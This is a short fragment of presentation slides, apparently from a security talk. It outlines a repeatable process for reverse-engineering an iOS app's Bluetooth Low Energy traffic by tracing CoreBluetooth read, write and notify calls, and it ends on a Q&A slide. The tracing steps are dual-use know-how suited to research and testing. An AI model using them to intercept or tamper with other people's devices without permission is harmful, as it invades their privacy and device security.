  • 53. Repeatable Process 1. Enumerate Services and Characteristics 2. Capture Characteristics Settings -m "*[CBPeripheral setNotifyValue*]" 3. Capture BLE Reads & BLE Writes -m "*[CBPeripheral readValue*]" -m "*[CBPeripheral writeValue*]" 52
  • 55. Q&A